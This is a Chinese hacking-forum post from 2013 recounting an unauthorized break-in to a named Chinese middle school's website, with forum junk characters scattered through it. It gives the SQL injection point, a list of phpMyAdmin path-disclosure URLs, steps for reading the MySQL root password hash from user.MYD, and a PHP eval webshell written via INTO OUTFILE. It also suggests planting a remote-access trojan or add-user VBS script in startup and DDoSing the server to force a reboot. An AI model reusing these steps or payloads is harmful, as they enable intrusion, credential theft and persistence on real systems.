找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2681|回复: 1
打印 上一主题 下一主题

友情检测湖北省大治市第一中学

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-11 21:32:15 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
第一眼看去,好像全是html静态的,都知道静态的根本不好日,多点击几个专栏9 |1 m( ~" }0 j# z
发现这个:http://www.dyyz.net.cn/celebrate/list.php?id=3  -0  -1 判断后确认存在注入!
* B: P+ C  ^; i* M+ @9 u
+ ?& y- T% o8 S4 v* v2 }" F& J& k" }$ ~# ~+ e9 H5 X; B

( p) r* [* D8 x' `! i5 t3 x* }常规手工不行,尝试突破也不行,利用穿山甲 可以注入:root权限 / s, r/ p  ^& C! T/ |; U* [( Y4 `

' R" T6 L, n- [2 z# M! d+ a4 F那么想可以直接写入shell ,getshell有几个条件:' `2 M: N# \9 D5 z9 }4 G9 c
1、知道站点物理路径
2、有足够大的权限
3、magic_quotes_gpc()=OFF3 B+ b. M/ I, B& _+ F6 M5 ^
! N" E* ?) T! e* l( n
试着爆绝对路径:
! W9 a2 \" O2 |9 |5 h' f1./phpMyAdmin/index.php?lang[]=1  # ]: T+ Z9 n% [/ G5 f6 g' T
2./phpMyAdmin/phpinfo.php  
1 ?' V6 @4 W- k3./load_file()  # D; S( H% O2 W( z$ i
4./phpmyadmin/themes/darkblue_orange/layout.inc.php  
% J0 ]4 c% @6 N5 d8 [" R: B5./phpmyadmin/libraries/select_lang.lib.php  3 ~7 s. w7 E+ H$ N6 C9 l; v9 ~+ g
6./phpmyadmin/libraries/lect_lang.lib.php  $ v$ U! M: u  k2 L' t
7./phpmyadmin/libraries/mcrypt.lib.php   
- g- p3 N; x6 g8./phpmyadmin/libraries/export/xls.php    O, c5 A* L" G! t  c# P) S$ N

0 s/ j% T8 X2 K9 Q: Q均不行...........................# {; b- ^3 w* g. g4 Y

& i$ c- a2 X) G8 q$ n御剑扫到这个:http://www.dyyz.net.cn//phpinfo.php       获得网站路径:D:/www/phpinfo.php. V2 c. d' {) {2 n% S2 V

7 I6 l5 @( Y+ ^) y# |+ C% ^( `# ^$ c4 K权限为root,知道网站路径,可是条件3不符合,没法写入shell ,不过服务器存在phpmyadmin
- e$ _' d% R7 w5 [9 B9 m. U$ u) q6 y# S: u0 o: X( B+ X8 f8 K
默认不行,尝试万能密码:帐号 'localhost'@'@" 密码空 ,登录失败9 s# w6 X; B4 e2 W

+ w6 C; J: G5 @$ Z( P7 r. u: }7 K; Q+ e敏感东西:http://202.103.49.66/Admincp.php  社工进不去...........  d6 d9 x. z7 Y& k

% `( `. r8 k6 Z  c想想root还可以读,读到root密码进phpmyadmin 也可以拿shell : H; ?5 f7 ]7 _* t

% [7 z+ J- q& u8 ]# V: P9 jhttp://www.dyyz.net.cn//phpinfo.php  泄露了D:\phpStudy\PHP5\php.ini
" o+ b' p$ h* s
, u5 J6 _0 B: x7 ]自己修改好读root密码的路径:D:\phpStudy\MySQL\Data\mysql\user.MYD
8 z' o5 x! H' y4 Z$ S, j. y& \2 d3 c& c# h: i
成功读到root密码:
  |& d1 h1 t/ d6 W9 p1 g
1 @# `; B* |; g+ h17---- r(0072). l$ B0 Y9 k# E7 ~4 A- A
18---- o(006f)8 Z* W& ]/ c9 O  n* k$ m) @5 H
19---- o(006f)4 b# T3 w; u+ T9 r2 f
20---- t(0074)# \2 R  y/ A7 R- E! x
21---- *(002a)
* z7 i  |+ H+ ^- `. T/ O7 ?1 ^( c22---- 8(0038)! E# A& E3 l9 l) T5 w
23---- 2(0032)" ?  d9 F2 c0 n: k
24---- E(0045)) Q1 v" a5 a5 {( w  p( a" s
25---- 1(0031)) F2 F5 j  M3 |/ O* q. b
26---- C(0043)
1 A% z5 B: C: V7 [27---- 5(0035)
& O" c2 `8 E& X4 G28---- 8(0038)
! V! \6 P+ \  Q0 B+ \29---- 2(0032)  M2 A1 D; e7 R: j3 p
30---- 8(0038)5 y. N. N; j! [  D
31---- A(0041)- Q8 M7 W4 d  L. R2 p& ^6 E2 d" Z  ^
32---- 9(0039)) D/ R, j8 `* Q; S
33---- B(0042); l7 X4 E, i+ [1 I8 N
34---- 5(0035)
( C% p' G* R& b3 q/ U( F- N7 O3 l2 R35---- 4(0034)
( z) w" |1 g7 Q6 I* `! `6 O+ Q36---- 8(0038)* T8 j8 e) F; K
37---- 6(0036)
# x/ a2 {. \0 R1 t38---- 4(0034)+ ]/ s" c- U, I
39---- 9(0039)
7 x! C5 W% b  T5 Y& S40---- 1(0031), \$ B% O1 F& ^8 |0 ~
41---- 1(0031)- N8 [# m4 C9 B& q7 L
42---- 5(0035)
) B2 h6 H  B# D: w43---- 3(0033), |# n9 [( ?. @' \
44---- 5(0035)2 x' u( s9 }, F
45---- 9(0039)
6 e) v: u& r* E6 [46---- 8(0038)8 T3 q1 R9 ^# Z9 h+ v1 F
47---- F(0046)
! l. r" g# z5 S1 c5 A+ Y48---- F(0046)  [$ v" \' b8 a4 d
49---- 4(0034)/ s0 J. Q3 P8 d6 q
50---- F(0046)
0 m7 x! X) L- H0 G2 U) ]4 B$ w51---- 0(0030)
9 ?  j) C# [$ L# e& K52---- 3(0033)/ j# f+ D. v& ~  U" m* v; h! }# |
53---- 2(0032)3 u6 I' H4 F2 Z  r& A
54---- A(0041)
# ~) \4 ]! V, L/ \55---- 4(0034)
+ V, e. [7 [' m% C( c* M56---- A(0041)
8 j' U3 X, `  i9 |4 o' L+ _1 O57---- B(0042)) k- w. H# a( R( e) N: c$ w+ R  N
58---- *(0044)
  h) N! ]6 X6 M" j! O8 C- s/ i59---- *(0035)
9 e4 p, u4 Z1 W! @60---- *(0041)
( I% z7 e4 f- s& o61---- *0032)
. S2 P  U) X3 F0 G4 p! g. M7 G4 N, R4 A2 o; |7 Q) ^8 S, o- D
解密后成功登陆phpmyamin# [& J' A5 R- }- U: A% `
                          
  u4 ?( r0 k8 N2 {3 V% q0 t5 t' x/ c9 y3 a! Z
                             + u& X# S9 r0 _8 ?! [& |: F# c) f

0 Y1 `8 M9 K5 @$ X/ W+ j$ y9 f找到mysql数据库,执行sql语句:elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'
2 U1 W5 g$ P9 o, B5 y5 `' F! v
+ x. P. e5 Z/ x5 \成功执行,拿下shell,菜刀连接:
  X4 }- t% C6 |6 k& I, S/ S( |
/ w8 _+ U. B+ j. G服务器不支持asp,aspx,php提权无果...................
9 b- t& L) o% D, i: i& z# |
7 a3 [6 u2 r) M6 k% E. m但服务器权限很松,上传个远控小马或是一个添加用户的vbs程序到启动里:) {5 W; S2 D" Y% ?; C- ^3 B& H
服务器上已经有个隐藏帐号了
7 x/ E5 y/ w. c8 d
别名     administrators
2 @5 w' D8 o6 b2 i1 A3 I; ^3 Z注释     管理员对计算机/域有不受限制的完全访问权

# b/ C7 |1 C: {4 G* g
成员

$ T$ h1 O2 h1 l# g* e
-------------------------------------------------------------------------------
4 |$ Q  l9 S* q% j6 ]: ?admin2 B7 @8 Q* c& P3 T, ^, j0 _- M
Administrator- ?2 w. I& |5 D# D: o: v% h
slipper$8 K( C0 @7 m0 V
sqluser; H, F$ g* X' \, [
命令成功完成。 " U6 I3 x! N7 {' ~9 F; }
) w) v4 g9 ]8 Y) E4 @" K1 Z% `
服务器权限很松,上传个vbs添加用户的到启动,不要用bat,会开机的时候显示运行批处理的。
* g1 ^- N+ h% E. ?  R. s- y/ p% y" y
ddos服务器重启,不然就只能坐等服务器重启了...............................0 N% F0 a  R5 U3 k0 V4 g$ ^

7 H7 \  c+ w5 q, {8 j4 S      

8 C6 a- _8 k  g7 v# m4 G, O) w0 ]5 s

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

沙发
发表于 2013-5-20 15:28:12 | 只看该作者
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表